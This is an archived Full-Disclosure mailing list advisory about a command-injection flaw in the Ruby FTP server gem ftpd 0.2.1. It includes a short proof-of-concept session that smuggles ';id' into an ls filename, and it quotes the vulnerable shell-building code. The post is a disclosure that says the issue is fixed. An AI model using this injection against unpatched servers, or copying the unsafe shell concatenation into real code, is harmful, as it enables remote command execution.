[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-disclosure] Remote command execution for Ruby Gem ftpd-0.2.1

To: full <full-disclosure@xxxxxxxxxxxxxxxxx>
Subject: [Full-disclosure] Remote command execution for Ruby Gem ftpd-0.2.1
From: "Larry W. Cashdollar" <larry0@xxxxxx>
Date: Sun, 03 Mar 2013 05:29:02 +0000 (GMT)

<html><body><div><h2>Remote command execution for Ruby Gem ftpd-0.2.1</h2>
<hr>
<i>2/28/2013</i>
<p><a 
href="https://github.com/wconrad/ftpd";>https://github.com/wconrad/ftpd</a><br>
<a href="http://rubygems.org/gems/ftpd";>http://rubygems.org/gems/ftpd</a>
</p>
<p>"ftpd is a pure Ruby FTP server library. It supports implicit and 
explicit TLS, passive and active mode, and most of the commands 
specified in <a href="http://www.cis.ohio-state.edu/rfc/rfc969.txt";>RFC 
969</a>. It an be used as part of a test fixture or embedded in a program."
</p>
<p>The ls interface can have commands injected into it if option or filename
contain the shell character ; The example.rb server listens to localhost only 
which I used to
test the ftp library.
</p>
<p>./ftpd-0.2.1/lib/ftpd/disk_file_system.rb
</p>
for this to work the file must exist in the CWD.

<p>ftp&gt; ls adfasdf;id<br>
200 PORT command successful<br>
150 Opening ASCII mode data connection<br>
-rw-r--r-- 1 root root 0 Mar  2 05:52 adfasdf<br>
uid=0(root) gid=0(root) groups=0(root)<br>
226 Transfer complete<br>
ftp&gt; 
</p>
<p>204      Ls interface used by List and NameList
205 <br>
206     module Ls<br>
207 
</p><pre>208       def ls(ftp_path, option)
209         path = expand_ftp_path(ftp_path)
210         dirname = File.dirname(path)
211         filename = File.basename(path)
212         command = [
213           'ls',
214           option,
215           filename,
216           '2&gt;&amp;1',
217         ].compact.join(' ')
218         if File.exists?(dirname)
219           list = Dir.chdir(dirname) do
220             `{command}`<br><br>This vulnerability has been fixed by the 
author in the latest release. <br></pre>
<p>Larry W. Cashdollar<br>
@_larry0<br>
<a href="http://otiose.dhs.org/";>http://otiose.dhs.org/</a>
</p></div></body></html>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Prev by Date: Re: [Full-disclosure] how do I know the fbi is followin
Next by Date: Re: [Full-disclosure] list patch
Previous by thread: Re: [Full-disclosure] how do I know the fbi is followin
Next by thread: [Full-disclosure] [SECURITY] [DSA 2636-2] xen regression update
Index(es):
- Date
- Thread